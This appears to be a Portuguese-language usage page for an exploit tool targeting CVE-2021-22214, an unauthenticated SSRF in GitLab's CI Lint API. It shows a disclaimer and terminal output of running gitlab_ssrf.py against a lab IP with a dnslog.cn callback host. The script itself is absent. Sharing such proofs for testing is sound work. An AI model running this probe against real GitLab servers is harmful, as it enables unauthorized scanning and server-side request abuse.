
Vulnerabilidade de SSRF não autorizado na API Gitlab CI Lint (CVE-2021-22214)
Vulnerabilidade de SSRF não autenticada na API GitLab CI Lint (CVE-2021-22214)
Este artigo e a ferramenta destinam-se apenas ao compartilhamento técnico; é estritamente proibido o uso para fins ilegais. Qualquer consequência decorrente do uso indevido é de total responsabilidade do usuário.
$ python3 gitlab_ssrf.py
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
Exemplo:
python3 gitlab_ssrf.py <target> <dnshost>
alvo: 192.168.80.136

$ python3 gitlab_ssrf.py http://192.168.80.136/ ssrf.sleg0x.dnslog.cn
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
[+] Pode existir uma vulnerabilidade SSRF no GitLab; verifique o registro do dnslog.
